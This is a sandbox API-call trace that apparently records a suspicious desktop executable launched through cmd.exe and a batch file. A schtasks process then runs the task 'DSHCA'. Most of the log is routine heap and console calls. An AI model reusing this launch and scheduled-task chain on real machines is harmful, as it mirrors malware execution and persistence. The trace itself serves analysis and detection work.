[0240.219] GetStartupInfoW (in: lpStartupInfo=0x3de6f4 | out: lpStartupInfo=0x3de6f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0240.220] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0240.220] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3de794*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3de7e0 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x3de7e0*(hProcess=0x74, hThread=0x84, dwProcessId=0x30c, dwThreadId=0x78c)) returned 1 [0240.252] CloseHandle (hObject=0x84) returned 1 [0240.252] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0240.252] GetProcessHeap () returned 0x460000 [0240.252] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4776e0 | out: hHeap=0x460000) returned 1 [0240.252] GetEnvironmentStringsW () returned 0x476b50* [0240.252] GetProcessHeap () returned 0x460000 [0240.252] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb86) returned 0x4776e0 [0240.252] FreeEnvironmentStringsW (penv=0x476b50) returned 1 [0240.253] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0242.228] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3de6d4 | out: lpExitCode=0x3de6d4*=0x1) returned 1 [0242.228] CloseHandle (hObject=0x74) returned 1 [0242.228] _vsnwprintf (in: _Buffer=0x3de81c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3de6e0 | out: _Buffer="00000001") returned 8 [0242.228] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0242.228] GetProcessHeap () returned 0x460000 [0242.228] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4776e0 | out: hHeap=0x460000) returned 1 [0242.228] GetEnvironmentStringsW () returned 0x476b50* [0242.229] GetProcessHeap () returned 0x460000 [0242.229] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb86) returned 0x4776e0 [0242.229] FreeEnvironmentStringsW (penv=0x476b50) returned 1 [0242.229] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0242.229] GetProcessHeap () returned 0x460000 [0242.229] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4776e0 | out: hHeap=0x460000) returned 1 [0242.229] GetEnvironmentStringsW () returned 0x476b50* [0242.229] GetProcessHeap () returned 0x460000 [0242.229] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb86) returned 0x4776e0 [0242.229] FreeEnvironmentStringsW (penv=0x476b50) returned 1 [0242.229] GetProcessHeap () returned 0x460000 [0242.229] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460dd0 | out: hHeap=0x460000) returned 1 [0242.229] DeleteProcThreadAttributeList (in: lpAttributeList=0x3de738 | out: lpAttributeList=0x3de738) [0242.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0242.230] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0242.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0242.230] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0242.231] _get_osfhandle (_FileHandle=0) returned 0x3 [0242.231] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0242.231] SetConsoleInputExeNameW () returned 0x1 [0242.231] GetConsoleOutputCP () returned 0x1b5 [0242.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0242.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0242.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0242.233] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0242.233] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.233] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474a18 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4748e8 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4747c0 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474748 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4746c0 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4744a8 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.233] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484c10 | out: hHeap=0x460000) returned 1 [0242.233] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460de8 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4612a0 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460e00 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4743c8 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474368 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474338 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4742d8 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474278 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741f8 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741a0 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461280 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461230 | out: hHeap=0x460000) returned 1 [0242.234] GetProcessHeap () returned 0x460000 [0242.234] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4611d0 | out: hHeap=0x460000) returned 1 [0242.235] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.235] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0242.235] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0x0, lpOverlapped=0x0) returned 1 [0242.235] GetLastError () returned 0x0 [0242.235] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.235] GetFileType (hFile=0x74) returned 0x1 [0242.235] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.235] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0242.235] GetProcessHeap () returned 0x460000 [0242.235] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0242.235] GetProcessHeap () returned 0x460000 [0242.235] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0242.236] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.236] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0242.236] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0cc, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0cc*=0x0, lpOverlapped=0x0) returned 1 [0242.236] GetLastError () returned 0x0 [0242.236] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.236] GetFileType (hFile=0x74) returned 0x1 [0242.236] _get_osfhandle (_FileHandle=3) returned 0x74 [0242.236] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0242.236] GetProcessHeap () returned 0x460000 [0242.236] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0242.236] GetProcessHeap () returned 0x460000 [0242.236] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0242.237] longjmp () [0242.237] _tell (_FileHandle=3) returned 226 [0242.237] _close (_FileHandle=3) returned 0 [0242.237] CmdBatNotification () returned 0x1 [0242.237] _get_osfhandle (_FileHandle=1) returned 0x7 [0242.237] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0242.237] _get_osfhandle (_FileHandle=1) returned 0x7 [0242.237] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0242.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0242.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0242.238] SetConsoleInputExeNameW () returned 0x1 [0242.238] GetConsoleOutputCP () returned 0x1b5 [0242.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0242.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0242.239] exit (_Code=1) Process: id = "218" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x2b85e000" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "204" os_parent_pid = "0xad0" cmd_line = "schtasks /Run /I /tn DSHCA" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 790 os_tid = 0x5d8 [0215.413] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f90c | out: lpSystemTimeAsFileTime=0x14f90c*(dwLowDateTime=0x38b52600, dwHighDateTime=0x1d68287)) [0215.414] GetCurrentProcessId () returned 0xb08 [0215.414] GetCurrentThreadId () returned 0x5d8 [0215.414] GetTickCount () returned 0x1161d70 [0215.414] RtlQueryPerformanceCounter () returned 0x1 [0215.415] GetModuleHandleA (lpModuleName=0x0) returned 0x1d0000 [0215.415] __set_app_type (_Type=0x1) [0215.415] __p__fmode () returned 0x770331f4 [0215.415] __p__commode () returned 0x770331fc [0215.415] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1e7881) returned 0x0 [0215.416] __wgetmainargs (in: _Argc=0x1f9e6c, _Argv=0x1f9e74, _Env=0x1f9e70, _DoWildCard=0, _StartInfo=0x1f9e80 | out: _Argc=0x1f9e6c, _Argv=0x1f9e74, _Env=0x1f9e70) returned 0 [0215.416] _onexit (_Func=0x1f0fe2) returned 0x1f0fe2 [0215.417] _onexit (_Func=0x1f0ff3) returned 0x1f0ff3 [0215.417] _onexit (_Func=0x1f1002) returned 0x1f1002 [0215.417] _onexit (_Func=0x1f101e) returned 0x1f101e [0215.417] _onexit (_Func=0x1f103a) returned 0x1f103a [0215.418] _onexit (_Func=0x1f1056) returned 0x1f1056 [0215.418] _onexit (_Func=0x1f1072) returned 0x1f1072 [0215.418] _onexit (_Func=0x1f108e) returned 0x1f108e [0215.418] _onexit (_Func=0x1f10aa) returned 0x1f10aa [0215.418] _onexit (_Func=0x1f10c6) returned 0x1f10c6 [0215.419] _onexit (_Func=0x1f10e2) returned 0x1f10e2 [0215.419] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.419] WinSqmIsOptedIn () returned 0x0 [0215.419] GetProcessHeap () returned 0x5e0000 [0215.419] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4ab8 [0215.419] SetLastError (dwErrCode=0x0) [0215.419] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0215.420] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0215.420] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0215.420] VerifyVersionInfoW (in: lpVersionInformation=0x14f384, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x14f384) returned 1 [0215.420] GetProcessHeap () returned 0x5e0000 [0215.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4ad0 [0215.420] lstrlenW (lpString="") returned 0 [0215.420] GetProcessHeap () returned 0x5e0000 [0215.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x2) returned 0x5f4ea0 [0215.420] GetProcessHeap () returned 0x5e0000 [0215.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4eb0 [0215.420] GetProcessHeap () returned 0x5e0000 [0215.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4ae8 [0215.420] GetProcessHeap () returned 0x5e0000 [0215.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4ed0 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4ef0 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4f10 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4f30 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4b00 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4f50 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4f70 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4f90 [0215.421] GetProcessHeap () returned 0x5e0000 [0215.421] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4fb0 [0215.422] GetProcessHeap () returned 0x5e0000 [0215.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4b18 [0215.422] GetProcessHeap () returned 0x5e0000 [0215.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f4fd0 [0215.422] GetProcessHeap () returned 0x5e0000 [0215.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5008 [0215.422] GetProcessHeap () returned 0x5e0000 [0215.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5028 [0215.422] GetProcessHeap () returned 0x5e0000 [0215.422] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5048 [0215.422] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.872] SetLastError (dwErrCode=0x0) [0215.872] GetProcessHeap () returned 0x5e0000 [0215.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5068 [0215.872] GetProcessHeap () returned 0x5e0000 [0215.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5088 [0215.872] GetProcessHeap () returned 0x5e0000 [0215.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f50a8 [0215.873] GetProcessHeap () returned 0x5e0000 [0215.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f50c8 [0215.873] GetProcessHeap () returned 0x5e0000 [0215.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f50e8 [0215.873] GetProcessHeap () returned 0x5e0000 [0215.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4b30 [0215.873] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.873] GetProcessHeap () returned 0x5e0000 [0215.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x208) returned 0x5f5970 [0215.873] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f5970, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0215.873] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x75440000 [0215.876] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0215.876] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0215.876] GetProcessHeap () returned 0x5e0000 [0215.876] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x74e) returned 0x5f5b80 [0215.877] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0215.877] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5f5b80 | out: lpData=0x5f5b80) returned 1 [0215.877] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0215.877] VerQueryValueW (in: pBlock=0x5f5b80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14f48c, puLen=0x14f490 | out: lplpBuffer=0x14f48c*=0x5f5f1c, puLen=0x14f490) returned 1 [0215.878] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.878] _vsnwprintf (in: _Buffer=0x5f5970, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x14f474 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0215.878] VerQueryValueW (in: pBlock=0x5f5b80, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x14f49c, puLen=0x14f498 | out: lplpBuffer=0x14f49c*=0x5f5d48, puLen=0x14f498) returned 1 [0215.878] lstrlenW (lpString="schtasks.exe") returned 12 [0215.878] lstrlenW (lpString="schtasks.exe") returned 12 [0215.879] lstrlenW (lpString=".EXE") returned 4 [0215.879] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0215.880] lstrlenW (lpString="schtasks.exe") returned 12 [0215.880] lstrlenW (lpString=".EXE") returned 4 [0215.880] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.880] lstrlenW (lpString="schtasks") returned 8 [0215.880] GetProcessHeap () returned 0x5e0000 [0215.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5128 [0215.880] GetProcessHeap () returned 0x5e0000 [0215.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5148 [0215.880] GetProcessHeap () returned 0x5e0000 [0215.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5168 [0215.880] GetProcessHeap () returned 0x5e0000 [0215.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5188 [0215.880] GetProcessHeap () returned 0x5e0000 [0215.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4b90 [0215.881] _memicmp (_Buf1=0x5f4b90, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0xa0) returned 0x5f6560 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f51a8 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f51c8 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f51e8 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4ba8 [0215.881] _memicmp (_Buf1=0x5f4ba8, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.881] GetProcessHeap () returned 0x5e0000 [0215.881] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x200) returned 0x5f6608 [0215.881] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5f6608, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0215.882] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0215.882] GetProcessHeap () returned 0x5e0000 [0215.882] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x30) returned 0x5f6810 [0215.882] _vsnwprintf (in: _Buffer=0x5f6560, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x14f478 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0215.882] GetProcessHeap () returned 0x5e0000 [0215.882] GetProcessHeap () returned 0x5e0000 [0215.882] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80) returned 1 [0215.882] GetProcessHeap () returned 0x5e0000 [0215.882] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5b80) returned 0x74e [0215.882] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80 | out: hHeap=0x5e0000) returned 1 [0215.882] SetLastError (dwErrCode=0x0) [0215.882] GetThreadLocale () returned 0x409 [0215.882] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="?") returned 1 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="create") returned 6 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="delete") returned 6 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="query") returned 5 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="change") returned 6 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="run") returned 3 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="end") returned 3 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] lstrlenW (lpString="showsid") returned 7 [0215.883] GetThreadLocale () returned 0x409 [0215.883] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.883] SetLastError (dwErrCode=0x0) [0215.883] SetLastError (dwErrCode=0x0) [0215.883] lstrlenW (lpString="/Run") returned 4 [0215.883] lstrlenW (lpString="-/") returned 2 [0215.883] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.884] lstrlenW (lpString="?") returned 1 [0215.884] lstrlenW (lpString="?") returned 1 [0215.884] GetProcessHeap () returned 0x5e0000 [0215.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4bc0 [0215.884] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.884] GetProcessHeap () returned 0x5e0000 [0215.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0xa) returned 0x5f4bd8 [0215.884] lstrlenW (lpString="Run") returned 3 [0215.884] GetProcessHeap () returned 0x5e0000 [0215.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4bf0 [0215.884] 